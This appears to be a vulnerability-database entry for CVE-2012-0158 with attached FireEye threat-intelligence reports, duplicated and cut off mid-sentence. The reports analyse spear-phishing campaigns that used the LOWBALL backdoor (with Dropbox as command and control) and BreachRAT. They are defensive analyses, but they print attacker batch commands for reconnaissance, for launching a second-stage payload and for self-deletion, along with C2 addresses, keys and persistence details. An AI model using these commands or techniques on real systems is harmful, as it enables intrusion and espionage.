ID CVE-2012-0158 Type cve Reporter cve@mitre.org Modified 2018-10-12T22:02:00
Description
The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."
{"fireeye": [{"lastseen": "2017-12-14T08:35:01", "bulletinFamily": "info", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "modified": "2015-12-01T08:00:00", "published": "2015-12-01T08:00:00", "id": "FIREEYE:B003673CB5C787DFBAF2E47FCDDD81B2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:06", "bulletinFamily": "info", "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/ Decryption Function**\n\n * Generate an array of integers from 0x00 to 0xff\n * Scrambles the state of the table using the given key\n * Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Sets the Windows Startup Registry key with the name \u201cSystem Update\u201d which points to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "modified": "2016-06-03T01:30:00", "published": "2016-06-03T01:30:00", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "id": "FIREEYE:6590BB51C6F8AABFD43517A1C445F65D", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "type": "fireeye", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nb9208a5b0504cb2283b1144fc455eaaa\n\n| \n\n\u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc \n \nec19ed7cddf92984906325da59f75351\n\n| \n\n\u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc \n \n6495b384748188188d09e9d5a0c401a4\n\n| \n\n(\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc \n \nIn all three cases, the payload was the same:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\ntime.exe \n \nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage \nservice to act as the CnC server. It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files. The communication occurs via HTTPS over port 443.\n\nAfter execution, the malware will use the Dropbox API to make an HTTP GET request using HTTPS over TCP port 443 for the files:\n\nMD5\n\n| \n\nFilename \n \n---|--- \n \nd76261ba3b624933a6ebb5dd73758db4\n\n| \n\nWmiApCom \n \n79b68cdd0044edd4fbf8067b22878644\n\n| \n\nWmiApCom.bat \n \nThe \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. Once the LOWBALL malware calls back to the Dropbox account, the attackers will create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d which contains commands to be executed on the compromised computer. This batch file is then executed on the target computer, with the results uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n@echo off \n \n--- \n \ndir c:\\ >> %temp%\\download \n \nipconfig /all >> %temp%\\download \n \nnet user >> %temp%\\download \n \nnet user /domain >> %temp%\\download \n \nver >> %temp%\\download \n \ndel %0 \n \n@echo off \n \ndir \"c:\\Documents and Settings\" >> %temp%\\download \n \ndir \"c:\\Program Files\\ \n \n\" >> %temp%\\download \n \nnet start >> %temp%\\download \n \nnet localgroup administrator >> %temp%\\download \n \nnetstat -ano >> %temp%\\download \n \nThese commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n@echo off \n \n--- \n \nren \"%temp%\\upload\" audiodg.exe \n \nstart %temp%\\audiodg.exe \n \ndir d:\\ >> %temp%\\download \n \nsysteminfo >> %temp%\\download \n \ndel %0 \n \nWe have previously observed the admin@338 group use BUBBLEWRAP. This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity:\n\nMD5\n\n| \n\n| \n \n---|---|--- \n \n0beb957923df2c885d29a9c1743dd94b\n\n| \n\naccounts.serveftp.com\n\n| \n\n59.188.0.197 \n \nBUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.\n\n### A Second Operation\n\nFireEye works closely with security researchers and industry partners to mitigate cyber threats, and we collaborated with Dropbox to respond to this activity. The Dropbox security team was able to identify this abuse and put countermeasures in place.\n\nOur cooperation uncovered what appears to be a second, ongoing operation, though we lack sufficient evidence to verify if admin@338 is behind it. The attack lifecycle followed the same pattern, though some of the filenames were different, which indicates that there may be multiple versions of the malware. In addition, while the operation targeting Hong Kong-based media involved a smaller number of targets and a limited duration, we suspect this second operation involves up to 50 targets. At this time, we are unable to identify the victims.\n\nIn this case, after the payload is delivered via an exploit the threat actor places files (named upload.bat, upload.rar, and period.txt, download.txt or silent.txt) in a directory on a Dropbox account. The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC\n\nThe threat actor will then download the results and then delete the files from the cloud storage account.\n\n# Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u2019\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. Pro-Democracy Media Company\u2019s Websites Attacked. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight. 31 August 2015. http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "modified": "2015-12-01T08:00:00", "published": "2015-12-01T08:00:00", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "id": "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:17", "bulletinFamily": "info", "description": "**Introduction** \nOn May 18, 2016, FireEye Labs observed a suspected Pakistan-based APT group sending spear phishing emails to Indian government officials. This threat actor has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets.\n\nThis group frequently uses a toolset that consists of a downloader and modular framework that uses plugins to enhance functionality, ranging from keystroke logging to targeting USB devices. We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016. Proofpoint also discussed the threat actors, whom they call [Transparent Tribe](<https://www.proofpoint.com/us/threat-insight/post/Operation-Transparent-Tribe>), in a March blog post.\n\nIn this latest incident, the group registered a fake news domain, timesofindiaa[.]in, on May 18, 2016, and then used it to send spear phishing emails to Indian government officials on the same day. The emails referenced the Indian Government\u2019s [7th Central Pay Commission (CPC)](<http://zeenews.india.com/business/news/economy/7th-pay-commission-govt-employees-likely-to-get-huge-pay-checks-by-june-july-2016_1880390.html>). These Commissions periodically review the pay structure for Indian government and military personnel, a topic that would be of interest to government employees.\n\n**Malware Delivery Method** \nIn all emails sent to these government officials, the actor used the same attachment: a malicious Microsoft Word document that exploited the [CVE-2012-0158 vulnerability](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to drop a malicious payload.\n\nIn previous incidents involving this threat actor, we observed them using malicious documents hosted on websites about the Indian Army, instead of sending these documents directly as an email attachment.\n\nThe email (Figure 1) pretends to be from an employee working at Times of India (TOI) and requests the recipient to open the attachment associated with the 7th Pay Commission. Only one of the recipient email addresses was publicly listed on a website, suggesting that the actor harvested the other non-public addressees through other means.\n\n** \nFigure 1: Contents of the Email**\n\nA review of the email header data from the spear phishing messages showed that the threat actors sent the emails using the same infrastructure they have used in the past.\n\n**Exploit Analysis** \nDespite being an older vulnerability, many threat actors continue to leverage [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) to exploit Microsoft Word. This exploit file made use of the same shellcode that we have observed this actor use across a number of spear phishing incidents.\n\n \n\n\n**Figure 2: Exploit Shellcode used to Locate and Decode Payload**\n\nThe shellcode (Figure 2) searches for and decodes the executable payload contained in memory between the beginning and ending file markers 0xBABABABA and 0xBBBBBBBB, respectively. After decoding is complete, the shellcode proceeds to save the executable payload into %temp%\\svchost.exe and calls WinExec to execute the payload. After the payload is launched, the shellcode runs the following commands to prevent Microsoft Word from showing a recovery dialog:\n\n\n\nLastly, the shellcode overwrites the malicious file with a decoy document related to the Indian defense forces\u2019 pay scale / matrix (Figure 3), displays it to the user and terminates the exploited instance of Microsoft Word.\n\n \n\n\n**Figure 3: Decoy Document related to 7th Pay Commission**\n\nThe decoy document's metadata (Figure 4) suggests that it was created fairly recently by the user \u201cBhopal\u201d.\n\n \n\n\n**Figure 4: Metadata of the Document**\n\nThe payload is a backdoor that we call the Breach Remote Administration Tool (BreachRAT) written in C++. We had not previously observed this payload used by these threat actors. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb. This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT.\n\nThe following is a brief summary of the activities performed by the dropped payload:\n\n1\\. Decrypts resource 1337 using a hard-coded 14-byte key \"MjEh92jHaZZOl3\". The encryption/decryption routine (refer to Figure 5) can be summarized as follows:\n\n \n\n\n**Figure 5: Encryption/ Decryption Function**\n\n * Generate an array of integers from 0x00 to 0xff\n * Scrambles the state of the table using the given key\n * Encrypts or decrypts a string using the scrambled table from (b).\n * A python script, which can be used for decrypting this resource, is provided in the appendix below.\n\n2\\. The decrypted resource contains the C2 server\u2019s IP address as well as the mutex name.\n\n3\\. If the mutex does not exist and a Windows Startup Registry key with name \u201cSystem Update\u201d does not exist, the malware performs its initialization routine by:\n\n * Copying itself to the path %PROGRAMDATA%\\svchost.exe\n * Sets the Windows Startup Registry key with the name \u201cSystem 